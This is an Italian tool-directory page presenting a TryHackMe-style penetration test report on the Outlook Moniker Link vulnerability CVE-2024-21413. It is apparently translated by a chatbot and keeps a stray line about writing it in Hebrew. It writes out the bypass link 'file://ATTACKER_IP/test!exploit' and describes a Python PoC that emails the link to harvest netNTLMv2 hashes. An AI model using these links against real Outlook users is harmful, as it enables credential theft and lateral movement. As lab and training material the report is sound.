Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook- — Il 13 febbraio 2024 Microsoft ha pubblicato una grave vulnerabilità di sicurezza in Microsoft Outlook, che ha ricevuto l'identificativo CVE-2024-21413, ed è conosciuta come Moniker Link Vulnerability. La vulnerabilità consente a un attaccante di bypassare il meccanismo Protected View di Outlook. | Kitploit
Strumenti/GitHubGitHub/eylommaayan/thm---cve-2024-21413-moniker-link-microsoft-outlook-
Analisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneSicurezza EmailLab e Pratica
GitHubeylommaayan/thm---cve-2024-21413-moniker-link-microsoft-outlook-

THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-

Vedi Repository
139 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Il 13 febbraio 2024 Microsoft ha pubblicato una grave vulnerabilità di sicurezza in Microsoft Outlook, che ha ricevuto l'identificativo CVE-2024-21413, ed è conosciuta come Moniker Link Vulnerability. La vulnerabilità consente a un attaccante di bypassare il meccanismo Protected View di Outlook.

Condividi

THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-

Il 13 febbraio 2024 Microsoft ha pubblicato una grave vulnerabilità di sicurezza in Microsoft Outlook, identificata come CVE-2024-21413, nota come Moniker Link Vulnerability. La vulnerabilità consente a un attaccante di bypassare il meccanismo Protected View di Outlook. image

Ottimo 👍 Ecco traduzione completa + formulazione come report di Penetration Testing (PT), in ebraico professionale e chiaro. Come richiesto – solo traduzione e formulazione. Le risposte, le immagini e i completamenti li aggiungerai tu, e se vorrai in seguito – ti aiuterò.


Report di Penetration Testing

CVE-2024-21413 – Moniker Link (Microsoft Outlook)


🧩 Sommario Esecutivo

Il 13 febbraio 2024 Microsoft ha pubblicato una grave vulnerabilità di sicurezza in Microsoft Outlook, identificata come CVE-2024-21413, nota come Moniker Link Vulnerability.

La vulnerabilità consente a un attaccante di bypassare il meccanismo Protected View di Outlook utilizzando un link speciale (Moniker Link), e di indurre il client Outlook della vittima a inviare credenziali di autenticazione (hash NTLM) a un server controllato dall'attaccante – senza eseguire alcun file e senza un efficace avviso di sicurezza.

La vulnerabilità può portare a una perdita di credenziali ed esiste anche una possibilità teorica di esecuzione remota di codice (RCE) .


📌 Dettagli della vulnerabilità

ParametroValore
ID vulnerabilitàCVE-2024-21413
Data di pubblicazione13 febbraio 2024
ScopritoreHaifei Li – Check Point Research
ImpattoCredential Leak + RCE potenziale
GravitàCritical
Complessità attaccoBassa
Punteggio CVSS9.8
Link ufficialehttps://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-21413

🎯 Versioni interessate

La vulnerabilità interessa le seguenti versioni:

  • Microsoft Office LTSC 2021 – dalla versione 19.0.0
  • Microsoft 365 Apps for Enterprise – dalla versione 16.0.1
  • Microsoft Office 2019 – dalla versione 16.0.1
  • Microsoft Office 2016 – prima della versione 16.0.5435.1001

🎓 Obiettivi di apprendimento

  • Comprendere il funzionamento della vulnerabilità
  • Conoscere il meccanismo Protected View di Outlook
  • Sfruttare la vulnerabilità per la perdita di credenziali
  • Misure di rilevamento (Detection)
  • Raccomandazioni per la mitigazione (Mitigation)

(Vulnerability Description)

image

Microsoft Outlook consente la visualizzazione di email in formato HTML e l'analisi di vari tipi di link come http:// e https://. Inoltre, Outlook supporta anche link speciali chiamati Moniker Links, che consentono l'avvio di applicazioni o l'accesso a risorse esterne nel sistema operativo.

In condizioni normali, quando un'email contiene un link che avvia un'applicazione esterna o accede a una risorsa di sistema (come un link file://), viene attivato il meccanismo di sicurezza Protected View di Outlook. Questo meccanismo mostra un avviso di sicurezza e blocca azioni pericolose come l'esecuzione di codice, macro o l'accesso a risorse di rete esterne.

Tuttavia, è stata trovata una vulnerabilità in Outlook (CVE-2024-21413) che consente di bypassare il meccanismo Protected View mediante una semplice manipolazione di un link di tipo Moniker Link.

Cosa abbiamo trovato (Findings)

Durante il test è emerso che l'utilizzo di un link normale come:

file://ATTACKER_IP/test

fa sì che Outlook tenti di accedere a una risorsa di rete tramite il protocollo SMB, ma questo tentativo viene bloccato da Protected View.

Al contrario, quando il link include il carattere speciale ! e una stringa di testo aggiuntiva, ad esempio:

file://ATTACKER_IP/test!exploit

Outlook non attiva Protected View ed effettua un tentativo di connessione al server remoto.

Durante questo tentativo:

  • Outlook cerca di accedere alla risorsa tramite SMB
  • Viene effettuata una richiesta di autenticazione automatica
  • Le credenziali di accesso dell'utente vengono inviate all'attaccante
  • Viene catturato l'hash netNTLMv2 di Windows della vittima

È importante notare che la condivisione remota non deve necessariamente esistere, poiché il tentativo di autenticazione viene comunque effettuato.

Impatto (Impact)

La vulnerabilità consente all'attaccante di:

  • Perdita di credenziali utente (hash netNTLMv2)
  • Esecuzione di attacchi offline (Cracking / Pass-the-Hash)
  • Movimento laterale nella rete aziendale

Inoltre, poiché i Moniker Links utilizzano il meccanismo COM (Component Object Model) di Windows, esiste una possibilità teorica di esecuzione remota di codice (RCE). Tuttavia, alla data del test, non esiste un Proof of Concept pubblico per realizzare effettivamente RCE tramite questa vulnerabilità.

Sfruttamento della vulnerabilità (Exploitation)

Nell'ambito dell'attacco, viene inviata alla vittima un'email contenente un Moniker Link simile a quello mostrato nel compito precedente. L'obiettivo dell'attaccante è creare un'email con un link Moniker Link che bypassi il meccanismo Protected View di Outlook, in modo che quando la vittima fa clic sul link, il suo client Outlook tenti di caricare un file dalla macchina dell'attaccante. Questa azione fa sì che l'hash netNTLMv2 della vittima venga inviato e catturato dall'attaccante.

Prima di eseguire l'attacco, esamineremo un Proof of Concept (PoC) creato a scopo dimostrativo (disponibile anche su GitHub).

Author: CMNatic | https://github.com/cmnatic Version: 1.0 | 19/02/2024

Il codice utilizza il linguaggio Python e invia un'email HTML contenente un Moniker Link malevolo.

Descrizione del PoC

Il PoC:

  • Riceve un indirizzo email dell'attaccante e un indirizzo email della vittima
  • Richiede una password per l'autenticazione SMTP (in questa room, la password per [email protected] è: attacker)
  • Contiene il contenuto HTML dell'email (html_content) con un Moniker Link malevolo
  • Imposta i campi dell'email: Subject, From, To
  • Invia l'email tramite il server di posta
  • In uno scenario reale, è necessario un server SMTP sotto il controllo dell'attaccante (in questa room il server è già fornito).
Scarica lo strumento